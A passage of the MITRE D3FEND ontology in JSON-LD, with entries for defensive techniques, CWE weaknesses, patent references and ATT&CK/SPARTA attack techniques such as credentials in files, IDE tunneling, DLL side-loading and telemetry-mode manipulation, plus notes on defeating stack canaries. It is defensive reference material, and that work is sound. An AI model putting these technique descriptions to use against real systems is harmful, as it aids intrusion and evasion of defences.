          "@id": "_:N6bd36cca3bd94390a64f8ca79b33ffda"
        },
        {
          "@id": "_:Nb8daa95ea9b340089c239fe4476786e2"
        },
        {
          "@id": "_:Nd23018db400c4f10ac0727bf3079cb01"
        }
      ]
    },
    {
      "@id": "_:N6bd36cca3bd94390a64f8ca79b33ffda",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accessed-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CentralProcessingUnit"
      }
    },
    {
      "@id": "_:Nb8daa95ea9b340089c239fe4476786e2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "_:Nd23018db400c4f10ac0727bf3079cb01",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CacheMemory"
      }
    },
    {
      "@id": "d3f:Reference-FirewallForProcessingAConnectionlessNetworkPacket_NationalSecurityAgency",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US7073196B1"
      },
      "d3f:kb-abstract": "The present invention is a device for and method of accessing a network by initializing a database, an approved list, and a disapproved list; receiving an connectionless network packet; computing a flow tag based on the connectionless network packet; discarding the connectionless network packet and returning to the second step if the flow tag is on the disapproved list; allowing access to the network and returning to the second step if the flow tag is on the approved list; comparing the flow tag to the database if the flow tag is not on the approved list or the disapproved list; discarding the connectionless network packet, adding the flow tag to the disapproved list, and returning to the second step if the database rejects the flow tag; and allowing access to the network, adding the flow tag to the approved list, and returning to the second step if the database accepts the flow tag.",
      "d3f:kb-author": "Patrick W. Dowd, John T. McHenry",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "National Security Agency",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Firewall for processing a connectionless network packet",
      "rdfs:label": "Reference - Firewall for processing a connectionless network packet - National Security Agency"
    },
    {
      "@id": "d3f:CWE-282",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-282",
      "d3f:definition": "The product assigns the wrong ownership, or does not properly verify the ownership, of an object or resource.",
      "rdfs:label": "Improper Ownership Management",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:may-transfer",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-transfer y: They entity x may send the thing y; that is, 'x transfers y' may be true.",
      "rdfs:label": "may-transfer",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:Reference-SecureCachingOfServerCredentials_DellProductsLP",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20100107241A1"
      },
      "d3f:kb-abstract": "A credential caching system includes receiving a set of authentication credentials, storing the set of authentication credentials in a credential cache memory, wherein the credential cache memory is coupled with a management controller, and supplying the set of authentication credentials for automatic authentication during a reset or reboot. In the event of a security breach, the credential caching system clears the set of authentication credentials from the credential cache memory so that the set of authentication credentials may no longer be used for a reset or reboot.",
      "d3f:kb-author": "Muhammed K. JaberMukund P. KhatriKevin T. MarksDon Charles McCall",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Dell Products LP",
      "d3f:kb-reference-of": {
        "@id": "d3f:AuthenticationCacheInvalidation"
      },
      "d3f:kb-reference-title": "Secure caching of server credentials",
      "rdfs:label": "Reference - Secure caching of server credentials - Dell Products LP"
    },
    {
      "@id": "d3f:T1472",
      "@type": "owl:Class",
      "d3f:attack-id": "T1472",
      "d3f:definition": "An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1643",
      "rdfs:label": "Generate Fraudulent Advertising Revenue - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1643"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Generate Fraudulent Advertising Revenue"
    },
    {
      "@id": "d3f:T1668",
      "@type": "owl:Class",
      "d3f:attack-id": "T1668",
      "d3f:definition": "Adversaries who successfully compromise a system may attempt to maintain persistence by “closing the door” behind them  – in other words, by preventing other threat actors from initially accessing or maintaining a foothold on the same system.",
      "rdfs:label": "Exclusive Control",
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:HTMLFile",
      "@type": "owl:Class",
      "d3f:definition": "A document file encoded in HTML.The HyperText Markup Language, or HTML is the standard markup language for documents designed to be displayed in a web browser. It can be assisted by technologies such as Cascading Style Sheets (CSS) and scripting languages such as JavaScript. Web browsers receive HTML documents from a web server or from local storage and render the documents into multimedia web pages. HTML describes the structure of a web page semantically and originally included cues for the appearance of the document.",
      "rdfs:label": "HTML File",
      "rdfs:seeAlso": {
        "@id": "dbr:HTML"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DocumentFile"
      },
      "skos:altLabel": "HTML File"
    },
    {
      "@id": "d3f:T1552.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:File"
      },
      "d3f:attack-id": "T1552.001",
      "d3f:definition": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.",
      "rdfs:label": "Credentials In Files",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1552"
        },
        {
          "@id": "_:N6c340cd35e294aebad796b2f43d4f63d"
        }
      ]
    },
    {
      "@id": "_:N6c340cd35e294aebad796b2f43d4f63d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:T1219.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1219.001",
      "d3f:definition": "Adversaries may abuse Integrated Development Environment (IDE) software with remote development features to establish an interactive command and control channel on target systems within a network. IDE tunneling combines SSH, port forwarding, file sharing, and debugging into a single secure connection, letting developers work on remote systems as if they were local. Unlike SSH and port forwarding, IDE tunneling encapsulates an entire session and may use proprietary tunneling protocols alongside SSH, allowing adversaries to blend in with legitimate development workflows. Some IDEs, like Visual Studio Code, also provide CLI tools (e.g., `code tunnel`) that adversaries may use to programmatically establish tunnels and generate web-accessible URLs for remote access. These tunnels can be authenticated through accounts such as GitHub, enabling the adversary to control the compromised system via a legitimate developer portal.(Citation: sentinelone operationDigitalEye Dec 2024)(Citation: Unit42 Chinese VSCode 06 September 2024)(Citation: Thornton tutorial VSCode shell September 2023)",
      "rdfs:label": "IDE Tunneling",
      "rdfs:subClassOf": {
        "@id": "d3f:T1219"
      }
    },
    {
      "@id": "d3f:T1499.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1499.002",
      "d3f:definition": "Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.",
      "d3f:produces": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      },
      "rdfs:label": "Service Exhaustion Flood",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1498"
        },
        {
          "@id": "d3f:T1499"
        },
        {
          "@id": "_:Nd837b4e76b374afb8c32843885f80b82"
        }
      ]
    },
    {
      "@id": "_:Nd837b4e76b374afb8c32843885f80b82",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:KernelEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving operations at the kernel level of an operating system, encompassing interactions with core system resources such as drivers, modules, system calls, and other privileged processes. Kernel events are critical for understanding low-level system behavior and ensuring the integrity of the operating environment.",
      "rdfs:label": "Kernel Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/kernel_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N7b33c74753f64cb1b8e245555f14c889"
        }
      ]
    },
    {
      "@id": "_:N7b33c74753f64cb1b8e245555f14c889",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Kernel"
      }
    },
    {
      "@id": "d3f:ConfigurationManagementDatabase",
      "@type": "owl:Class",
      "d3f:definition": "A database used to store configuration records throughout their lifecycle. The Configuration Management System (CMS) maintains one or more CMDBs, and each CMDB stores attributes of configuration items (CIs), and relationships with other CIs.",
      "rdfs:isDefinedBy": {
        "@id": "https://web.archive.org/web/20111201040529/http://www.best-management-practice.com/gempdf/itil_glossary_v3_1_24.pdf"
      },
      "rdfs:label": "Configuration Management Database",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/resource/Configuration_management_database"
        },
        {
          "@id": "https://wiki.en.it-processmaps.com/index.php/ITIL_Glossary/_ITIL_Terms_C#Config_Management_Database_.28CMDB.29"
        },
        {
          "@id": "https://www.dmtf.org/standards/cmdbf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:CCI-002691_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uses indicators of compromise.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002691"
    },
    {
      "@id": "d3f:NISTSP800-53ControlCatalog",
      "@type": "owl:Class",
      "d3f:definition": "A NIST SP 800-53 control catalog provides the entire set of security and privacy controls for a version of NIST SP 800-53.",
      "rdfs:label": "NIST SP 800-53 Control Catalog",
      "rdfs:seeAlso": {
        "@id": "https://doi.org/10.6028/NIST.SP.800-53r5"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ControlCatalog"
        },
        {
          "@id": "_:N94f0ff0697824ba79817125f466973d5"
        }
      ]
    },
    {
      "@id": "_:N94f0ff0697824ba79817125f466973d5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-member"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NISTControl"
      }
    },
    {
      "@id": "d3f:DigitalArtifact",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An information-bearing artifact (object) that is, or is encoded to be used with, a digital computer system. This concept is broad to include the literal instances of an artifact, or an implicit summarization of changes to or properties of other artifacts.",
      "d3f:display-baseurl": "/dao/artifact/",
      "d3f:synonym": "Digital Asset",
      "rdfs:label": "Digital Artifact",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Digital_artifactual_value"
        },
        {
          "@id": "dbr:Virtual_artifact"
        },
        {
          "@id": "https://www.iso.org/obp/ui/#iso:std:iso-iec:19770:-1:ed-3:v1:en"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Artifact"
      }
    },
    {
      "@id": "d3f:ConnectedHoneynet",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ConnectedHoneynet"
      ],
      "d3f:d3fend-id": "D3-CHN",
      "d3f:definition": "A decoy service, system, or environment, that is connected to the enterprise network, and simulates or emulates certain functionality to the network, without exposing full access to a production system.",
      "d3f:kb-article": "## How it works\nDecoy honeypots are deployed within the enterprise environment that emulate certain services or portions of an OS to attract attackers.\n\n## Considerations\nA connected honeynet provides a tradeoff between emulating certain functionality but not being as sophisticated as an integrated honeynet. The connected honeynet may not provide enough functionality to detect new attack patterns or zero day exploits but could provide enough functionality for specific known vulnerabilities.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ModificationOfAServerToMimicADeceptionMechanism_AcalvioTechnologiesInc"
      },
      "d3f:spoofs": {
        "@id": "d3f:LocalAreaNetwork"
      },
      "rdfs:label": "Connected Honeynet",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyEnvironment"
        },
        {
          "@id": "_:N53835f03005f432681866b4e03dbb650"
        }
      ]
    },
    {
      "@id": "_:N53835f03005f432681866b4e03dbb650",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalAreaNetwork"
      }
    },
    {
      "@id": "d3f:StackFrameCanaryValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:StackFrameCanaryValidation"
      ],
      "d3f:d3fend-id": "D3-SFCV",
      "d3f:definition": "Comparing a value stored in a stack frame with a known good value in order to prevent or detect a memory segment overwrite.",
      "d3f:kb-article": "## How it works\n\nThis defense must be applied at compile-time, or via a patch to the program binary.  Stack Frame Canary Verification inserts instructions at the prologue and epilogue of desired functions.  In the prologue, a canary value, typically with the same size as the register size, is stored in the system of record and on the stack.  Typically, the canary is loaded to where it has a memory address just below that of the saved instruction pointer and base pointer.  In the epilogue, the canary value stored on the stack and, is compared to the canary value in the system of record.  If the values are different, other techniques such as those in Process Eviction might be invoked, such as Process Termination to end the current process, or Executable Blacklisting to blacklist the potentially vulnerable or malfunctioning executable.\n\nStack Frame Canary Verification is commonly used to detect potential tampering of a saved register value on the stack before it has been restored.  Examples of registers with values commonly saved to the stack include the instruction pointer and the base pointer.\n\nThe canary should be stored between where the start of a buffer overrun is likely, and the data to protect, in cases where the buffer size increases it will overwrite the data to be protected.\n\nOn most processor architectures, including x86, x64, and ARM, a \"push\" operation to store data to the stack grows the stack towards a lower memory address.  As in these architectures, saved register values are stored to the stack at a point in time just before space is made for the local function variables, the saved register values have a higher address than that of the local function variables.  Values at increasing indexes of a buffer are written to increasing memory addresses; therefore, an overwrite in the local variable buffer could overwrite saved register values, and a stack canary between these two would be useful in detecting an overwrite.\n\nOn some other processor architectures such as the B5000, the stack grows towards increasing memory addresses, and some architectures, such as System Z and RCA1802A, stack direction can be chosen.  If the stack grows towards increasing memory addresses, while this architecture inherently provides more protection against a saved register being overwritten, other data including local function variables might be overwritten.\n\n\n## Considerations\n\nThere are several ways that the protection provided by a canary could be rendered ineffective.\n\n### Performing a malicious action before the canary is checked\n\nIf the attacker alters the memory in such a way that it performs a malicious action before the epilogue is called, then this protection will not be effective.  This includes altering the logic of the program by altering the values of local variables stored on the function stack, or by causing an exception and exploiting the exception mechanism such as the SEH (Structured Exception Handling) mechanism on Windows.\n\n### Determining the canary value\n\nDetermining the canary value is possible through reading memory either for the code used to check the canary, or from the stored canary value itself in a stack frame.\n\n### Changing the canary value\n\nA vulnerability such as a write-what-where condition that allows one to write data after the canary in the stack, would allow control of the value of the saved instruction pointer without needing to know the canary value.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-GS_BufferSecurityCheck_MicrosoftDocs"
        },
        {
          "@id": "d3f:Reference-StackSmashingProtection_StackGuard_RedHat"
        }
      ],
      "d3f:validates": {
        "@id": "d3f:StackFrame"
      },
      "rdfs:label": "Stack Frame Canary Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:N556de90163784d8ab02041bf8f4e384e"
        }
      ]
    },
    {
      "@id": "_:N556de90163784d8ab02041bf8f4e384e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:validates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:CWE-232",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-232",
      "d3f:definition": "The product does not handle or incorrectly handles when a value is not defined or supported for the associated parameter, field, or argument name.",
      "rdfs:label": "Improper Handling of Undefined Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-229"
      }
    },
    {
      "@id": "d3f:CWE-707",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-707",
      "d3f:definition": "The product does not ensure or incorrectly ensures that structured messages or data are well-formed and that certain security properties are met before being read from an upstream component or sent to a downstream component.",
      "rdfs:label": "Improper Neutralization",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:T1027.011",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.011",
      "d3f:definition": "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless)",
      "rdfs:label": "Fileless Storage",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:DE-0003.06",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.06",
      "d3f:definition": "Spacecraft expose modes that control what telemetry is sent and how, real-time channels, recorder playback, beacon/summary only, event-driven reporting, and per-virtual-channel/APID selections. By switching modes or editing the associated parameters (rates, filters, playback queues, index ranges), an adversary can thin, defer, or reroute observability. Typical effects include suppressing high-rate engineering streams in favor of minimal beacons, delaying playback of time periods of interest, replaying benign segments, or redirecting packets to alternate virtual channels that are not routinely monitored. Telemetry continues to flow, but it no longer reflects the activity the operators need to see.",
      "d3f:modifies": {
        "@id": "d3f:OperatingMode"
      },
      "rdfs:label": "Telemetry Downlink Modes - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/06/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:Nbcacbd73dde5443f9aa751592af0509f"
        }
      ],
      "skos:prefLabel": "Telemetry Downlink Modes"
    },
    {
      "@id": "_:Nbcacbd73dde5443f9aa751592af0509f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "d3f:CCI-002289_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system supports the association of organization-defined security attributes with organization-defined subjects by authorized individuals (or processes acting on behalf of individuals).",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002289"
    },
    {
      "@id": "d3f:ProcessSetUserIDEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a process changes or adopts a specific user identity, modifying its access privileges or operational context.",
      "rdfs:label": "Process Set User ID Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEvent"
        },
        {
          "@id": "_:Nd6afee43807440269eeca1e0582e4323"
        }
      ]
    },
    {
      "@id": "_:Nd6afee43807440269eeca1e0582e4323",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCreationEvent"
      }
    },
    {
      "@id": "d3f:copies",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x copies y: A technique or agent x reproduces or makes an exact copy of some digital artifact y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01738810-v"
      },
      "rdfs:label": "copies",
      "rdfs:subPropertyOf": {
        "@id": "d3f:creates"
      }
    },
    {
      "@id": "d3f:CWE-196",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-196",
      "d3f:definition": "The product uses an unsigned primitive and performs a cast to a signed primitive, which can produce an unexpected value if the value of the unsigned primitive can not be represented using a signed primitive.",
      "rdfs:label": "Unsigned to Signed Conversion Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-681"
      }
    },
    {
      "@id": "d3f:d3fend-id",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Unique identifier for a D3FEND technique. D3-[Acronym].",
      "rdfs:label": "d3fend-id",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-data-property"
      }
    },
    {
      "@id": "d3f:NetworkSensor",
      "@type": "owl:Class",
      "d3f:definition": "A Network Sensor monitors network traffic and communication patterns.",
      "rdfs:label": "Network Sensor",
      "rdfs:subClassOf": {
        "@id": "d3f:CyberSensor"
      }
    },
    {
      "@id": "d3f:Reference-OutlierParentsOfCmd_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-11-002/"
      },
      "d3f:kb-abstract": "Many programs create command prompts as part of their normal operation including malware used by attackers. This analytic attempts to identify suspicious programs spawning cmd.exe by looking for programs that do not normally create cmd.exe.\n\nWhile this analytic does not take the user into account, doing so could generate further interesting results. It is very common for some programs to spawn cmd.exe as a subprocess, for example to run batch files or windows commands. However many process don't routinely launch a command prompt - for example Microsoft Outlook. A command prompt being launched from a process that normally doesn't launch command prompts could be the result of malicious code being injected into that process, or of an attacker replacing a legitimate program with a malicious one.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-11-002: Outlier Parents of Cmd",
      "rdfs:label": "Reference - CAR-2014-11-002: Outlier Parents of Cmd - MITRE"
    },
    {
      "@id": "d3f:BlockDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:Partition"
        },
        {
          "@id": "d3f:PartitionTable"
        }
      ],
      "d3f:definition": "A block device (or block special file) provides buffered access to hardware devices, and provides some abstraction from their specifics.\n\nIEEE Std 1003.1-2017: A file that refers to a device. A block special file is normally distinguished from a character special file by providing access to the device in a manner such that the hardware characteristics of the device are not visible.",
      "d3f:may-contain": {
        "@id": "d3f:Volume"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Device_file#BLOCKDEV"
      },
      "rdfs:label": "Block Device",
      "rdfs:seeAlso": {
        "@id": "https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap03.html#tag_03_79"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N69ac1148b54741f59109b6630fe82d21"
        },
        {
          "@id": "_:N04323496683747f0b4f2842c1f39667f"
        },
        {
          "@id": "_:N17633b7f264c48edb65bc0600850c1d8"
        },
        {
          "@id": "_:N12b3a0f6705f4961aaf74ce5fe44fedb"
        }
      ],
      "skos:altLabel": "Block Special File"
    },
    {
      "@id": "_:N69ac1148b54741f59109b6630fe82d21",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:N04323496683747f0b4f2842c1f39667f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Partition"
      }
    },
    {
      "@id": "_:N17633b7f264c48edb65bc0600850c1d8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PartitionTable"
      }
    },
    {
      "@id": "_:N12b3a0f6705f4961aaf74ce5fe44fedb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Volume"
      }
    },
    {
      "@id": "d3f:T1046",
      "@type": "owl:Class",
      "d3f:attack-id": "T1046",
      "d3f:definition": "Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)",
      "rdfs:label": "Network Service Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:Switch",
      "@type": "owl:Class",
      "d3f:definition": "A network switch (also called switching hub, bridging hub, and by the IEEE MAC bridge) is networking hardware that connects devices on a computer network by using packet switching to receive and forward data to the destination device. A network switch is a multiport network bridge that uses MAC addresses to forward data at the data link layer (layer 2) of the OSI model. Some switches can also forward data at the network layer (layer 3) by additionally incorporating routing functionality. Such switches are commonly known as layer-3 switches or multilayer switches.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Network_switch"
      },
      "rdfs:label": "Switch",
      "rdfs:subClassOf": {
        "@id": "d3f:ComputerNetworkNode"
      },
      "skos:altLabel": [
        "Bridging Hub",
        "MAC Bridge",
        "Network Switch",
        "Switching Hub"
      ]
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForProvidingAnonymousRemailingAndFilteringOfElectronicMail_Nokia",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/JPH11161574A"
      },
      "d3f:kb-abstract": "To make anonymous a sender name present on an actual transmission source address by including an alias transmission source address substitution unit and removing the actual transmission source address from an electronic mail message. SOLUTION: A hash value of the destination address of an electronic mail message is calculated (S330). Then, (n) blank bytes are added to a compressed actual transmission source address (S340). The true length of the actual transmission source address is hidden by adding blank bytes. Further, a 2nd bit field is added to a secret key saved locally in a remailer, and an extended secret key characteristic of the destination address is generated. Then, the compressed actual transmission source address is ciphered according to the data ciphering standards using the extended secret key characteristic of the destination address as a cipher key (S350). Further, the 2nd bit field is added to the ciphered and compressed actual transmission source address (S360).",
      "d3f:kb-author": "Eran Gabber, Phillip B Gibbons, David Morris Kristol, Yossi Matias, Alain J Mayer",
      "d3f:kb-organization": "Nokia of America Corp",
      "d3f:kb-reference-of": {
        "@id": "d3f:EmailFiltering"
      },
      "d3f:kb-reference-title": "System and method for providing anonymous remailing and filtering of electronic mail",
      "rdfs:label": "Reference - System and method for providing anonymous remailing and filtering of electronic mail - Nokia"
    },
    {
      "@id": "d3f:T1574.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.002",
      "d3f:definition": "Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).",
      "d3f:may-create": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:may-modify": {
        "@id": "d3f:SharedLibraryFile"
      },
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1574.001",
      "rdfs:label": "DLL Side-Loading",
      "rdfs:seeAlso": "T1574.001",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:Ne847526482284089982fe1632a4aca85"
        },
        {
          "@id": "_:N3251719cfd7e4acfaa4477066840aa14"
        }
      ]
    },
    {
      "@id": "_:Ne847526482284089982fe1632a4aca85",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N3251719cfd7e4acfaa4477066840aa14",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:CWE-215",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-215",
      "d3f:definition": "The product inserts sensitive information into debugging code, which could expose this information if the debugging code is not disabled in production.",
      "rdfs:label": "Insertion of Sensitive Information Into Debugging Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:Semi-supervisedCo-training",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSCT",
      "d3f:definition": "Multi-view co-training involves training the classifiers in completely different views of training data. On the other hand, single-view co-training methods are generally applied as ensemble methods.",
      "d3f:kb-article": "## References\nJashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)",
      "rdfs:label": "Semi-supervised Co-training",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-supervisedWrapperMethod"
      }
    },
    {
      "@id": "d3f:MicrosoftWordDOCFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOC File"
    },
    {
      "@id": "d3f:T1218",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218",
